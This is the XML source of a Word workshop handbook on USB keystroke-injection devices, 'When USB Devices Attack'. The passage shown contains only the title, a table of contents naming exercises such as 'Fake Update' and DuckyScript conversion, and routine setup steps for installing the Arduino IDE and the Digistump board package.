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gif" ContentType="image/gif"/>
  <Override PartName="/word/media/image3.gif" ContentType="image/gif"/>
  <Override PartName="/word/media/image1.gif" ContentType="image/gif"/>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r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>When USB Devices Attack</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Workshop Handbook</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Tim Wilkes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>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51_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Section 1 - Setup</w:t>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc153_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Installation</w:t>
              <w:tab/>
              <w:t>3</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1135_152967944">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Linux Install</w:t>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc155_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>The IDE</w:t>
              <w:tab/>
              <w:t>6</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc842_3995523646">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>The toolbar area</w:t>
              <w:tab/>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc844_3995523646">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>The Editor Area</w:t>
              <w:tab/>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc846_3995523646">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>The Console Area</w:t>
              <w:tab/>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9638" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc169_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Section 2 – The Exercises</w:t>
              <w:tab/>
              <w:t>7</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc171_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Exercise 1 – Blinkenlights</w:t>
              <w:tab/>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc173_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Aim</w:t>
              <w:tab/>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc838_3995523646">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Method</w:t>
              <w:tab/>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc840_3995523646">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>So what did we just do?</w:t>
              <w:tab/>
              <w:t>8</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc175_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Exercise 2 – Notepad</w:t>
              <w:tab/>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc177_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Aim</w:t>
              <w:tab/>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc179_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Method</w:t>
              <w:tab/>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1114_152967944">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Results</w:t>
              <w:tab/>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc181_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Exercise 3 – Fake Update</w:t>
              <w:tab/>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc183_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Aim</w:t>
              <w:tab/>
              <w:t>9</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc185_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Method</w:t>
              <w:tab/>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1116_152967944">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Further Exercise Ideas</w:t>
              <w:tab/>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc187_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Exercise 4 – Web Deploy</w:t>
              <w:tab/>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc189_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Aim</w:t>
              <w:tab/>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc191_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Method</w:t>
              <w:tab/>
              <w:t>10</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1118_152967944">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Further Exercise Ideas</w:t>
              <w:tab/>
              <w:t>11</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1120_152967944">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Exercise 5 – Random Numbers</w:t>
              <w:tab/>
              <w:t>11</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1122_152967944">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Aim</w:t>
              <w:tab/>
              <w:t>11</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1124_152967944">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Method</w:t>
              <w:tab/>
              <w:t>11</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents2"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9355" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1126_152967944">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Exercise 6 – Convert a Ducky Script</w:t>
              <w:tab/>
              <w:t>11</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1128_152967944">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Aim</w:t>
              <w:tab/>
              <w:t>12</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents3"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9072" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc1130_152967944">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Method</w:t>
              <w:tab/>
              <w:t>12</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9638" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc193_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Appendix 1 - Useful Links</w:t>
              <w:tab/>
              <w:t>13</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p>
          <w:pPr>
            <w:pStyle w:val="Contents1"/>
            <w:tabs>
              <w:tab w:val="right" w:pos="9638" w:leader="dot"/>
            </w:tabs>
            <w:rPr/>
          </w:pPr>
          <w:hyperlink w:anchor="__RefHeading___Toc195_2153683434">
            <w:r>
              <w:rPr>
                <w:rStyle w:val="IndexLink"/>
              </w:rPr>
              <w:t>Appendix 2 - DuckyScript To Digispark Reference</w:t>
              <w:tab/>
              <w:t>14</w:t>
            </w:r>
          </w:hyperlink>
          <w:r>
            <w:rPr>
              <w:rStyle w:val="IndexLink"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="__RefHeading___Toc151_2153683434"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">Section 1 - </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Setup</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="__RefHeading___Toc153_2153683434"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:rPr/>
        <w:t>Installation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">From: </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
          </w:rPr>
          <w:t>https://digistump.com/wiki/digispark/tutorials/connecting</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">First download the appropriate Arduino package at the Arduino.cc website: </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="StrongEmphasis"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
          </w:rPr>
          <w:t>https://www.arduino.cc/en/Main/Software</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">If using Arduino 1.6.6 or higher and windows - you will need to download and install the drivers manually. Download, unzip and run “Install Drivers” (on 32bit systems) or “DPInst64” (on 64bit systems). If you get stuck, try following the steps </w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
          </w:rPr>
          <w:t>shown in this YouTube video</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">. The driver files are located here: </w:t>
      </w:r>
      <w:hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b w:val="false"/>
            <w:bCs w:val="false"/>
          </w:rPr>
          <w:t>https://github.com/digistump/DigistumpArduino/releases/download/1.6.7/Digistump.Drivers.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>Install or Unzip the Arduino application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>Run the Arduino application.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>In the Arduino application go to the “File” menu and select “Preferences”</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>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10100" cy="40290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4610100" cy="4029075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>In the box labeled “Additional Boards Manager URLs” enter:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:before="0" w:after="283"/>
        <w:ind w:left="707" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>http://digistump.com/package_digistump_index.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>and click OK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: If you already have additional URLs entered in that box, then click the button on the right of the box and enter this on a new line. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>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0100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6120130" cy="4010025"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:spacing w:before="0" w:after="0"/>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>Go to the “Tools” menu and then the “Board” submenu - select “Boards Manager” and then from the type drop down select “Contributed”:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="709"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>
        <w:ind w:left="707" w:hanging="283"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StrongEmphasis"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t>Select the “Digistump AVR Boards” package and click the “Install” button.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>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02336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8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6120130" cy="4023360"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="TextBody"/>
        <w:numPr>
